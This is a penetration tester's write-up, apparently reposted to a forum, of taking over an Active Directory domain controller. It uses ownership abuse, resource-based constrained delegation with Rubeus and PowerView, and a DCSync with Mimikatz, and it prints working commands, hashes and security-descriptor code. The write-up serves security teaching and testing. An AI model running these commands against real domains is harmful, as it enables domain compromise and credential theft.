Write privileges on the targeted computer object are required. These privileges will be used to configure the RBCD on the computer object and the user with the serviceprincipalname attribute set.
The RBCD attack involves three steps: request a TGT, S4U2Self, and S4U2Proxy.
S4U2Self works on any account that has the serviceprincipalname attribute set.
S4U2Self allows us to obtain a valid TGS for arbitrary users (including sensitive users such as Domain Admins group members).
S4U2Proxy always produces a forwardable TGS, even if the TGS used isn't forwardable.
We can use Rubeus to perform the RBCD attack with a single command.

One of the requirements, owning an SPN, was already satisfied due to the targeted kerberoasting attack performed to obtain SUSANK's credentials. I still needed write privileges on the targeted computer, which in this case was the DC. Although I didn't have write privileges directly, I had WriteOwner privileges with the second user mentioned in the introduction, SVCRDM.

Figure 8 – SVCRDM could have GenericAll privileges if the ownership of MAEMODC01 was acquired.

An implicit GenericAll ACE is applied to the owner of an object, which provided an opportunity to obtain the required write privileges. In the next section I explain how I changed the owner of the targeted computer using Active Directory Users & Computers (ADUC) in combination with Rubeus. Later on, a simulated attack scenario is shown demonstrating how to escalate privileges within AD in a real environment by abusing the RBCD computer takeover primitive.

Ticket Management with Rubeus

Since the SVCRDM user was part of the RMTADMINS group, which could modify the owner of the DC, it was possible to make SVCRDM, or any other user I owned, the owner of the DC. Being the owner of an object grants GenericAll privileges. However, I only had the NTLM hash for the SVCRDM user, so I chose to authenticate with Kerberos. In order to do that, I used Rubeus (thank you to Harmj0y and all the people that contributed to this project).

To change the owner of the DC I had to use the SVCRDM account. An easy way to change the owner of an AD object is by using PowerView. Another way to apply the same change is by using ADUC remotely. ADUC allows us to manage AD objects such as users, groups, and Organizational Units (OU), as well as their attributes. That means that we can use it to update the owner of an object, given the required privileges.
Since I couldn’t crack the hash of SVCRDM’s password, I wasn’t able to authenticate using SVCRDM’s credentials but it was possible to request a Kerberos tickets for this account using Rubeus and the hash. Later, I started ADUC remotely from my VM to change the owner of the targeted DC. It’s out of the scope of this blog to explain how Kerberos works, please refer to the Microsoft Kerberos docs for further details. On a VM (not domain-joined), I spawned cmd.exe as local admin using runas with the user SVCRDM. This prompt allowed me to request and import Kerberos tickets to authenticate to domain services. I ran runas with the /netonly flag to ensure the authentication is only performed when remote services are accessed. As I had used the /netonly flag and had I chosen to authenticate using Kerberos tickets, the password I gave runas wasn’t the correct one. runas /netonly /user:svcrdm@maemo.local cmd Figure 9 – Starting Runas with the SVCRDM domain user and a wrong password. In the terminal running as the SVCRDM user, I used Rubeus to request a Ticket-Granting-Ticket (TGT) for this user. The /ptt (pass-the-ticket) parameter is important to automatically add the requested ticket into the current session. Rubeus.exe asktgt /user:SVCRDM /rc4:a568802050cd83b8898e5fb01ddd82a6 /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local Figure 10 – Requesting a TGT for the SVCRDM user with Rubeus. In order to access a certain service using Kerberos, a Ticket-Granting-Service (TGS) ticket mis required. By presenting the TGT, I was authorised to request a TGS to access the services I was interested on. These services were the LDAP and CIFS services on the DC. We can use Rubeus to request these two TGS’. First, I requested the TGS for the LDAP service: Rubeus.exe asktgs /ticket:[TGT_Base64] /service:ldap/MAEMODC01.maemo.local /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local Figure 11 – Using the previous TGT to obtain a TGS for the LDAP service on MAEMODC01. In the same way, I requested a TGS for the CIFS service of the targeted DC: Rubeus.exe asktgs /ticket:[TGT_Base64] /service:cifs/MAEMODC01.maemo.local /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local Figure 12 – Using the previous TGT to obtain a TGS for the CIFS service on MAEMODC01. The tickets were imported successfully and can be listed in the output of the klist command: Figure 13 – The requested Kerberos tickets were imported successfully in the session. Literally Owning the DC With the Kerberos tickets imported, we can start ADUC and use it to modify the targeted Active Directory environment. As with every other program, we can start ADUC from the terminal. In order to do it, I used mmc, which requires admin privileges. This is why the prompt I used to start runas and request the Kerberos tickets required elevated privileges. Because of the SVCRDM Kerberos ticket imported in the session, we’ll be able to connect to the DC without credentials being provided. To start ADUC I typed the following command: mmc %SystemRoot%\system32\dsa.msc After running this command, ADUC gave an error saying that the machine wasn’t domain joined and the main frame was empty. No problem, just right-click the “Active Directory Users and Computers” on the left menu to choose the option “Change Domain Controller…”. There, the following window appeared: Figure 14 – Selecting the Directory Server on ADUC. 
After adding the targeted DC, Figure 14 shows the status as "Online", so I clicked "OK" and was able to see all the AD objects:

Figure 15 – AD objects of the MAEMO domain were accessible remotely using ADUC.

Every AD object has a tab called "Security" which includes all the ACEs that are applied to it. This tab isn't enabled by default and must be activated by clicking View > Advanced Features. At this point, I was ready to take ownership of the DC. Accessing the MAEMODC01 computer properties within the Domain Controllers OU and clicking the advanced button in the "Security" tab, I was able to see that the owner was the Domain Admins group:

Figure 16 – MAEMODC01 owned by the Domain Admins group.

The user SVCRDM had the privilege to change the owner, so I clicked on "Change" and selected the SVCRDM user:

Figure 17 – MAEMODC01 owner changed to the user SVCRDM.

If you have a close look at Figure 17, most of the buttons are disabled because of the limited permissions granted to SVCRDM; changing the owner is the only option available. As I said before, ownership of an object implies GenericAll privileges. After all these actions, I wanted to make everything a bit more comfortable for myself, so I added the user RONALD.MGMT with GenericAll privileges on the MAEMODC01 object for use later. The final status of the DACL for the MAEMODC01 object looked as follows:

Figure 18 – User RONALD.MGMT with Full Control (GenericAll) on MAEMODC01.

Computer Object Takeover

According to Elad Shamir's blog post (which I still highly encourage you to read), one of the requirements to weaponise the S4U2Self and S4U2Proxy process with RBCD is to have control over an SPN. I had run a targeted kerberoast attack to take control of SUSANK, so that requirement was satisfied as this user had the serviceprincipalname attribute set. If it isn't possible to get control of an SPN, we can use Powermad by Kevin Robertson to abuse the default machine account quota and create a new computer account, which will have the serviceprincipalname attribute set by default. In the GitHub repository, Kevin mentioned the following:

"The default Active Directory ms-DS-MachineAccountQuota attribute setting allows all domain users to add up to 10 machine accounts to a domain. Powermad includes a set of functions for exploiting ms-DS-MachineAccountQuota without attaching an actual system to AD."

Before abusing the computer object takeover primitive, some more requirements needed to be met. The GenericAll privileges I set up for RONALD.MGMT previously would allow me to write the necessary attributes of the targeted DC. This is important because I needed to add an entry to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the targeted computer (the DC) that pointed back to the SPN I controlled (SUSANK). This configuration will be abused to impersonate any user in the domain, including highly privileged accounts such as the Domain Admins group members:

Figure 19 – Domain Admins group members.

The following details are important in order to abuse the DACL computer takeover:

The required SPN is SUSANK.
The targeted computer is MAEMODC01, the DC of the maemo.local domain.
The user RONALD.MGMT has GenericAll privileges on MAEMODC01.
The required tools are PowerView and Rubeus.

I had access to a lot of systems due to the compromise of both the RMTAdmins and MGMTAdmins groups. I used the privileges I had to access a domain-joined Windows box. There, I loaded PowerView in memory since, in this case, in-memory PowerShell script execution wasn't detected.
Harmj0y detailed how to take advantage of the previous requirements in this blog post. During the assessment, I followed his approach but did not need to create a computer account, as I already owned an SPN. Harmj0y also provided a gist containing all the commands needed.

Running PowerShell as the RONALD.MGMT user, the first things we need are the SIDs of the main domain objects involved: RONALD.MGMT and MAEMODC01.maemo.local. Although it wasn't necessary, I validated the privileges the user RONALD.MGMT had on the targeted computer to double-check the GenericAll privileges I had granted it. I used Get-DomainUser and Get-DomainObjectAcl:

#First, we get ronald.mgmt (attacker) SID
$TargetComputer = "MAEMODC01.maemo.local"
$AttackerSID = Get-DomainUser ronald.mgmt -Properties objectsid | Select -Expand objectsid
$AttackerSID

#Second, we check the privileges of ronald.mgmt on MAEMODC01
$ACE = Get-DomainObjectAcl $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID}
$ACE

#We can validate the ACE applies to ronald.mgmt
ConvertFrom-SID $ACE.SecurityIdentifier

Figure 20 – Obtaining the attacker SID and validating its permissions on the targeted computer.

The next step was to configure the msDS-AllowedToActOnBehalfOfOtherIdentity attribute for the owned SPN on the targeted computer. Using Harmj0y's template, I only needed the service account SID to prepare the array of bytes for the security descriptor that represents this attribute.

#Now, we get the SID for our SPN user (susank)
$ServiceAccountSID = Get-DomainUser susank -Properties objectsid | Select -Expand objectsid
$ServiceAccountSID

#Later, we prepare the raw security descriptor
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -Argument "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ServiceAccountSID))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Figure 21 – Creating the raw security descriptor including the SPN SID for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

Then I added the raw security descriptor forged earlier to the DC, which was possible due to the GenericAll rights earned after taking ownership of the DC.

# Set the raw security descriptor created before ($SDBytes)
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# Verify the security descriptor was added correctly
$RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | Select -Expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl

Figure 22 – The raw security descriptor forged before was added to the targeted computer.

With all the requirements fulfilled, I went back to my Windows VM. There, I spawned cmd.exe via runas /netonly using SUSANK's compromised credentials:

Figure 23 – New CMD prompt spawned using Runas and SUSANK credentials.

Since I didn't have SUSANK's hash, I used Rubeus to obtain it from the cleartext password:

Figure 24 – Obtaining the password hashes with Rubeus.

Elad included the S4U abuse technique in Rubeus, and we can perform this attack by running a single command in order to impersonate a Domain Admin (Figure 19), in this case RYAN.DA:

Rubeus.exe s4u /user:susank /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:ryan.da /msdsspn:cifs/MAEMODC01.maemo.local /dc:MAEMODC01.maemo.local /domain:maemo.local /ptt

Figure 25 – S4U abuse with Rubeus. TGT request for SUSANK.
Figure 26 – S4U abuse with Rubeus. S4U2Self to get a TGS for RYAN.DA.

Figure 27 – S4U abuse with Rubeus. S4U2Proxy to impersonate RYAN.DA and access the CIFS service on the targeted computer.

The previous S4U abuse imported a TGS for the CIFS service into the session due to the /ptt option. A CIFS TGS can be used to remotely access the file system of the targeted system. However, in order to perform further lateral movement I chose to also obtain a TGS for the LDAP service and, since the impersonated user is part of the Domain Admins group, I could use Mimikatz to run a DCSync. Adapting the previous Rubeus command to target the LDAP service can be done as follows:

Rubeus.exe s4u /user:susank /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:ryan.da /msdsspn:ldap/MAEMODC01.maemo.local /dc:MAEMODC01.maemo.local /domain:maemo.local /ptt

Listing the tickets should show the two TGS obtained after running the S4U abuse:

Figure 28 – CIFS and LDAP TGS for the user RYAN.DA.

With these TGS tickets (for a DA account) I was able to run Mimikatz to perform a DCSync and extract the hashes of sensitive domain users such as RYAN.DA and KRBTGT:

Figure 29 – DCSync with Mimikatz to obtain RYAN.DA hashes.

Figure 30 – DCSync with Mimikatz to obtain KRBTGT hashes.

Since getting DA is just the beginning, the obtained hashes can be used to move laterally within the domain to find sensitive information and show the real impact of the assessment.

Clean Up Operations

Once the attack has been completed successfully, it doesn't make sense to leave domain objects with configurations that aren't needed. In fact, these changes could be a problem in the future. For this reason, I considered it important to include a cleanup section.

Remove the msDS-AllowedToActOnBehalfOfOtherIdentity security descriptor configured on the targeted computer. The security descriptor can be removed by using PowerView:

Get-DomainComputer $TargetComputer | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'

Clean up the GenericAll ACE added to the targeted computer for the RONALD.MGMT user. Because this ACE was added using ADUC, I used SVCRDM to remove it: just select the RONALD.MGMT Full Control row and delete it.

Restore the Domain Admins group as the owner of the targeted computer. Once more using ADUC with the SVCRDM user, I selected the Change section to modify the owner back to the Domain Admins group.

Remove the serviceprincipalname attribute on SUSANK. Using the ActiveDirectory PowerShell module, I ran the following command to remove the SPN attribute configured on SUSANK:

Set-ADUser susank -ServicePrincipalNames @{Remove="sensepost/targetedkerberoast"} -Server MAEMODC01.maemo.local

Conclusions

In this blog post I wanted to show a simulation of a real attack scenario used to escalate privileges on an Active Directory domain. As I said in the beginning, none of this is new, and the original authors did a great job with their research and the tools they released. The same changes could be applied using different tools to obtain the exact same results. However, the main goal of this blog post was to show different ways to reach the same result. Some of the actions performed in this blog post could be done in a much easier way by using a single tool such as PowerView. A good example is the way I chose to modify the owner of the DC. The point here was to show that by mixing concepts such as Kerberos tickets and some command line tricks, we can use ADUC remotely without a cleartext password.
Although it required more steps, using all this stuff during the assessment was worth it! BloodHound is a useful tool for Active Directory assessments, especially in combination with other tools such as Rubeus and PowerView. AD DACL object takeovers are easier to spot and fix (or abuse), bringing new ways to elevate privileges in a domain. Elad's blog post is a really useful resource full of important information on how delegation can be used and abused.

With this blog post I wanted to show you that, although we may not have all the requirements to perform an attack at the outset, with a certain level of privileges we can configure everything we need. As with any other technique used during pentests, we can chain different misconfigurations to reach a goal such as Domain Admin. Although getting a DA account isn't the goal of every pentest, it's a good starting point to find sensitive information in the internal network of a company.

References

Links:
https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
https://www.blackhat.com/docs/us-17/wednesday/us-17-Robbins-An-ACE-Up-The-Sleeve-Designing-Active-Directory-DACL-Backdoors-wp.pdf
https://wald0.com/?p=68
https://adsecurity.org/?p=1729

If you find any glaring mistakes or have any further questions, do not hesitate to send an email to sergio [at] the domain of this blog.

Sursa: https://sensepost.com/blog/2020/chaining-multiple-techniques-and-tools-for-domain-takeover-using-rbcd/
-
Recommendation: https://app.pluralsight.com/profile/author/jared-demott
-
About CyberEDU

Platform & Exercises

We have taken on the mission to educate and train the next generation of infosec specialists with real-life hacking scenarios of varying difficulty, suited to different levels of knowledge. It's a dedicated environment for practicing offensive and defensive skills.

100 exercises used in international competitions, ready to be discovered.

Our experts created a large variety of challenges covering different aspects of the infosec field. All challenges are based on real-life scenarios which are meant to teach students how to spot vulnerabilities and how to react in different situations.

Link: https://cyberedu.ro/
-
Expectations: "I'm joining the police/army to protect people with a gun in my hand, risking my life!" Reality: "Delivering communion bread and candlelight to the elderly"